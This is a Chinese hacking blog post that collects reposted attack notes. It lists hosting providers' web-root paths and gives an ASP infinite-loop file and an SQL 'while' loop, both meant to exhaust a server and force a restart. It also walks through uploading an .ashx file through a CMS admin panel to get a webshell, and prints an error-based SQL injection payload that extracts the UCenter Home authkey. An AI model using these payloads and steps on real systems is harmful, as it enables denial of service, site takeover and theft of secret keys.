si1ence'blog

留着以后看

D:\virtualhost\web580651\www\ 新网虚拟主机
F:\usr\fw04408\xpinfo\ 万网虚拟主机
D:\hosting\wwwroot\ Prim@Hosting虚拟主机
e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机
d:\freehost\zhoudeyang\web\ 星外虚拟主机主机
D:\vhostroot\LocalUser\gdrt\ 星
D:\virtualhost\web580651\www\新网虚拟主机
F:\usr\fw04408\xpinfo\万网虚拟主机
D:\hosting\wwwroot\Prim@Hosting虚拟主机
e:\wwwroot\longzhihu\wwwroot\华众虚拟主机
d:\freehost\zhoudeyang\web\星外虚拟主机主机
D:\vhostroot\LocalUser\gdrt\星外分支
f:\host\wz8088\web\星外分支
D:\Vhost\WebRoot\51dancecn\未知
D:\vhostroot\localuser\vhostroot

<%
for i = 1 to 100
i = 10
next
%>

保存为 *.asp，然后访问该文件，cpu速度上升，然后管理员来重启

DB-OWNER权限让服务器重启

sql命令:while 1<9 begin select char(0) end

收集自农民博客。

详情

http://www.exploit-db.com/exploits/16940/

比较鸡肋哦。基于WIN系统IIS。

具体方法：
进入后台，首先添加一个前台账号（直接到前台注册也行，这里后台添加比较方便，
不用填一些垃圾问题，最好添加前台管理员，可以删贴），
然后在后台“附件管理” 那里 开启附件上传并添加一个允许上传ashx的后缀
（其它的不行，CER可以，但我网站不解析，大家看到这里都懂了撒），
然后在前台用刚才的号发贴，上传ashx的附件，再回到后台：”
网站地图“–“附件优化”–通过筛选日期找到你刚才上传的ashx的附件–属性
–得到地址–访问ashx的地址–得到WEBSHELL

修复方案：iis删除该解析  

转自:T00ls

作者:心灵

这个漏洞不足以得到马儿 但能修改任何文章 也算是一个严重的漏洞！
废话不说  
经典对白 看代码！
member\soft_edit.php

作者：alibaba

Exploit：
要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base

保存时创建一个POST，参数名为:
friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]
参数值: 随意

这里我使用火狐的tamper实时添加POST

得到 uchome的 authkey